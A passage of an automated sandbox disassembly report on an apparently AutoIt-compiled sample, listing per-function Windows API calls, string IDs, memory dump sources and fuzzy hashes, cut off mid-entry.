                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: @U=u$U
                                                                                                                        • API String ID: 4009187628-4110099822
                                                                                                                        • Opcode ID: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
                                                                                                                        • Instruction ID: 6a7442baf897b7f100ead10c7b58d3ad4d9cbc5dbde225e092372e4ab66aa7f3
                                                                                                                        • Opcode Fuzzy Hash: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
                                                                                                                        • Instruction Fuzzy Hash: 1671DF34400205DFCF258F64C998AEA3FB5FF8A31AF14426AED555A266D7309CCADF50
                                                                                                                        Function 00583388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 005833CF
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 005833F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 4099089115-3080491070
                                                                                                                        • Opcode ID: a4d18173b416ad31ccc9c32976d39cacf5178401b6d7aec81655b3faf6f9b551
                                                                                                                        • Instruction ID: b97928cbf6668750fe2cbab7faf2d9bd8b255a27dcb82d62a7769dcb87649bd9
                                                                                                                        • Opcode Fuzzy Hash: a4d18173b416ad31ccc9c32976d39cacf5178401b6d7aec81655b3faf6f9b551
                                                                                                                        • Instruction Fuzzy Hash: EE51B37180020ABAEF15EBA0DD5AEEEBF78BF54740F104466F50572161EB312F98DB60
                                                                                                                        Function 0057B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                        • API String ID: 1256254125-769500911
                                                                                                                        • Opcode ID: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
                                                                                                                        • Instruction ID: 9d3d8b958fce7c9f6bb1e33cf411d7d3e757fb5e8f625136b9ba80c7532fa462
                                                                                                                        • Opcode Fuzzy Hash: 6c34b784d65c3a51936ad62e978f5782042e8d66e6090e8b84198591dbbcaad6
                                                                                                                        • Instruction Fuzzy Hash: 2C41FD72A000279BDB205F7DD8906BE7FB5FFA0754B24812AE629D7284E735CD81D790
                                                                                                                        Function 00585393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 005853A0
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00585416
                                                                                                                        • GetLastError.KERNEL32 ref: 00585420
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 005854A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
                                                                                                                        • Instruction ID: bbbc0acc88e2e69d1789eae54116aef7bc10f5fac25d6c84168142adee5899ab
                                                                                                                        • Opcode Fuzzy Hash: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
                                                                                                                        • Instruction Fuzzy Hash: B4318F35A006059FDB10EF68C488AAA7FF4FF45305F548066E805EB3A2EB71DD86CB90
                                                                                                                        Function 005A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateMenu.USER32 ref: 005A3C79
                                                                                                                        • SetMenu.USER32(?,00000000), ref: 005A3C88
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005A3D10
                                                                                                                        • IsMenu.USER32(?), ref: 005A3D24
                                                                                                                        • CreatePopupMenu.USER32 ref: 005A3D2E
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005A3D5B
                                                                                                                        • DrawMenuBar.USER32 ref: 005A3D63
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                        • String ID: 0$F
                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                        • Opcode ID: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
                                                                                                                        • Instruction ID: 27a32d64678b2d3c73eb1829b21462897e1da032068909cd2280e2de5c407997
                                                                                                                        • Opcode Fuzzy Hash: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
                                                                                                                        • Instruction Fuzzy Hash: 18416879A01209EFDB14CF64D884AAE7FB5FF5A354F140029F946A7360D730AA14DB94
                                                                                                                        Function 005A2D03 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 005A2D1B
                                                                                                                        • GetDC.USER32(00000000), ref: 005A2D23
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005A2D2E
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 005A2D3A
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 005A2D76
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 005A2D87
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,005A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 005A2DC2
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005A2DE1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3864802216-2594219639
                                                                                                                        • Opcode ID: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                                                                                        • Instruction ID: b6d39b8348042ce4923334a8c5d0a1ebf2a7551c46a4fdac2a551361e7c2b3a7
                                                                                                                        • Opcode Fuzzy Hash: 826aeedad7eb1065195f62f79de3374bf1494445f255d6e05f40f3e10ce37e8e
                                                                                                                        • Instruction Fuzzy Hash: 92316972201214BBEB218F548C8AFEB3FA9FB1A715F044055FE089A292C6759C55CBA4
                                                                                                                        Function 0057209F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 71windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 005720AB
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 005720C0
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0057214D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1290815626-1428604138
                                                                                                                        • Opcode ID: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                                                                                        • Instruction ID: e24e2ee8d6ef4f15f5b1a9a8917e5d0e8b7af0ecbfbba80c76c1da46cb71f507
                                                                                                                        • Opcode Fuzzy Hash: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
                                                                                                                        • Instruction Fuzzy Hash: 9C11597A288307BAF6116229FC0BDA63F9CFB15324F20401BFB09A50D1FE716841BA14
                                                                                                                        Function 005A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005A3A9D
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005A3AA0
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 005A3AC7
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005A3AEA
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005A3B62
                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005A3BAC
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005A3BC7
                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005A3BE2
                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005A3BF6
                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005A3C13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 312131281-0
                                                                                                                        • Opcode ID: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                                                                                        • Instruction ID: 54982ee2cc5b44355717b08d8d85a7a00505cbc00a454a5e6c79052ab5caf453
                                                                                                                        • Opcode Fuzzy Hash: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
                                                                                                                        • Instruction Fuzzy Hash: D5615975900248AFDB10DFA8CC81EEE7BF8BF4A714F100099FA15AB291C770AE45DB60
                                                                                                                        Function 0057B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0057B151
                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B165
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0057B16C
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B17B
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0057B18D
                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1A6
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1B8
                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1FD
                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B212
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B21D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2156557900-0
                                                                                                                        • Opcode ID: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                                                                                        • Instruction ID: a050517342d5caed08633f028526d7c7b1b44c480fee28fff55d126ac75abfec
                                                                                                                        • Opcode Fuzzy Hash: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
                                                                                                                        • Instruction Fuzzy Hash: 72318C75510208AFEB149F24EC8CB6D7FA9BB61311F108455FA09DB191E7B49E48AF60
                                                                                                                        Function 00542C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00542C94
                                                                                                                          • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                                                                                          • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                                                                                        • _free.LIBCMT ref: 00542CA0
                                                                                                                        • _free.LIBCMT ref: 00542CAB
                                                                                                                        • _free.LIBCMT ref: 00542CB6
                                                                                                                        • _free.LIBCMT ref: 00542CC1
                                                                                                                        • _free.LIBCMT ref: 00542CCC
                                                                                                                        • _free.LIBCMT ref: 00542CD7
                                                                                                                        • _free.LIBCMT ref: 00542CE2
                                                                                                                        • _free.LIBCMT ref: 00542CED
                                                                                                                        • _free.LIBCMT ref: 00542CFB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                                                                                        • Instruction ID: f2b647019b5027eac990fe8d3f060b4f816d861e06b3150a55d4c80a2b105c10
                                                                                                                        • Opcode Fuzzy Hash: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
                                                                                                                        • Instruction Fuzzy Hash: DF11C076100119AFDB02EF95D886CDD3FB9FF45354F9144A0FA489B222DA31EE909B90
                                                                                                                        Function 00511410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00511459
                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 005114F8
                                                                                                                        • UnregisterHotKey.USER32(?), ref: 005116DD
                                                                                                                        • DestroyWindow.USER32(?), ref: 005524B9
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0055251E
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0055254B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: 9541059b41f50802284718f7f863aeb41200e05843feb8a08d0f0ea2b5a615c4
                                                                                                                        • Instruction ID: 6868d8ac1e200b6f10c86dff4f2ce615e05f25ca166e739ad64f0d328634d7ee
                                                                                                                        • Opcode Fuzzy Hash: 9541059b41f50802284718f7f863aeb41200e05843feb8a08d0f0ea2b5a615c4
                                                                                                                        • Instruction Fuzzy Hash: 4AD1BD31701622CFEB19EF14D4A8A69FFA4BF46700F1441EEE94A6B252DB30AC56CF54
                                                                                                                        Function 0058359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                                                                                          • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                                                                                        • LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 4099089115-2391861430
                                                                                                                        • Opcode ID: 6486e61e01dbd625323da5e8f3b72a790640b16d7bc6ace5e07fd1a04a48c3f8
                                                                                                                        • Instruction ID: 01a258eaff1156b73ec1966dd901fbecae17bf0f3fcd8015bee7ecbafa8b6670
                                                                                                                        • Opcode Fuzzy Hash: 6486e61e01dbd625323da5e8f3b72a790640b16d7bc6ace5e07fd1a04a48c3f8
                                                                                                                        • Instruction Fuzzy Hash: 0C516B7180020ABAEF14EBA0DC9AEEDBF38FF54700F144525F515721A1EB306B99DBA0
                                                                                                                        Function 005A3886 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 141windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005A3925
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005A393A
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005A3954
                                                                                                                        • _wcslen.LIBCMT ref: 005A3999
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 005A39C6
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005A39F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                        • String ID: @U=u$SysListView32
                                                                                                                        • API String ID: 2147712094-1908207174
                                                                                                                        • Opcode ID: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
                                                                                                                        • Instruction ID: a1f9f8aba6b8e4cb58b309b81d8268a2f0420fcd9578ca1bfad196a03ca267d3
                                                                                                                        • Opcode Fuzzy Hash: f01334a2a6e1618b05379d73bd6a9e98ff72a4ae3d3d6b655d43d670c74be508
                                                                                                                        • Instruction Fuzzy Hash: A641D071A00219ABEB21DF64CC49BEE7FA9FF49354F100526F948E7281D7B49E84CB90
                                                                                                                        Function 005A2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
